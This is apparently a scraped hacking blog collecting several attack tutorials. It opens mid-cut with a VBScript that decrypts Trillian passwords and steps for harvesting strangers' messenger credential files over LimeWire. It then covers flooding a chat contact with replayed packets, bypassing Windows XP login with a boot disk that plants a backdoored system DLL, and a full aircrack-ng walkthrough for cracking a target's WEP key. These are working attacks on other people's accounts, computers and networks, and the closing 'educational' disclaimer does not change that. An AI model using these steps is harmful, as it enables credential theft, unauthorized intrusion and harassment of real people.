Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = "243,038,129,196,057,134,219,146,113,163,185,230,0 83,122,149," & _

"124,000,000,000,000,000,000,255,000,000,128,000,0 00,000,128," & _

"128,000,255,000,000,000,128,000,128,000,128,128,0 00,000,000," & _

"128,255,000,128,000,255,000,128,128,128,000,085,1 10,097,098," & _

"108,101,032,116,111,032,114,101,115,111,108,118,1 01,032,072," & _

"084,084,080,032,112,114,111,120,000"

keys = split(key, ",")

main()

sub main()

pwd = ""

pwd = inputbox("Enter the Encrypted Trillian Password", "", "")

if pwd = "" then exit sub

pwd = trim(pwd)

pwdl = len(pwd)/2

redim pwds(pwdl-1)

for x = 0 to ubound(pwds)

'msgbox mid(pwd,(x * 2)+1,2)

pwds(x) = int("&h" & mid(pwd,(x * 2)+1,2))

next

if ubound(pwds) > ubound(keys) then

maxval = ubound(keys)

else

maxval = ubound(pwds)

end if

for x = 0 to maxval

goods = goods & chr(pwds(x) xor keys(x))

next

inputbox "Decrypted Password","",goods

end sub


4. Select FILE and choose SAVE AS

5. From the "Save as Type" drop-down menu select "All Files (*.*)"

6. Save the file as "TrillianPass.vbs" in the desired folder. Remember it's location.

7. Start LimeWire

8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini

9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.

10. Open the downloaded file in Notepad.

11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.

12. Open the file that was created earlier: TrillianPass.vbs

13. Paste the encryped password into the Trillian Password Cracker and press "OK" to reveal the real password

14. How this works:

The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program's preferences are set to share a whole drive instead of just one or two folders .
Share:

Crash your friends computer while chatting!

For this you need WPE Pro. Just search for it in google. Once you have downloaded it, open up Yahoo or Windows Live Messenger (preferably Windows Live).

Download here...

Once you opened up Windows Live target it using WPE and start recording packets.

Go back to your Windows Live and send a nudge.

Stop the recording and check out the packets that you have recorded (will show up to the right of the record/stop button). Select a sent a packet and right click it and send it every 1 second or less. Your friend will be receiving nudges every 1 second! Smile

But the sending of this packet will stop if you send a new nudge through your IM window. And you won't be able to see the "You have sent a nudge" when you are sending the packets again. But the other person can.

Blackcoder...
Share:

Accessing window's system from linux :

type in terminal..
rdesktop -f (for full screen) IPAddress
that's it .........
ex:
[root @ filesystem] rdesktop -a 24 -f IP

Blackcoder
Share:

How to Hack Into a Windows XP Computer Without Changing Password


There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization.


Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL from http://depositfiles.com/en/files/395974.
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
14. Go to commands and enable the options and enable the god command.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Share:

Total Guide to WEP Hacking [WIFI] [TUT]

This is my First Ever Tutorial at Wireless Hacking... This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking.. 

The Stuff that you are going to need is 
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection


Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.

[Image: backtrackstartup.png]

Just Select "Start BackTrack FrameBuffer (1024x768)" 
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
[Image: backtrackstartnetwork.png]

Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
[Image: airmon1.png]

Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second

You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}


[Image: airodump1.png]

Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)

[Image: airodump3.png]

Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay

Its your Lucky day..lol.. I will be going through both. 

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful. 

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.

[Image: aireplay3.png]

OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.

[Image: aireplay6.png]

Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it. 

Just hit ENTER and there we go, the Packet has been made.

[Image: aireplay8.png]

Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...

[Image: aireplay12.png]

Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....

[Image: aireplay15.png]



===================================================================
This article was published on http://www.hackforums.net/showthread.php?tid=1010102
and i take no credit for writing it.
===================================================================
Share:

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.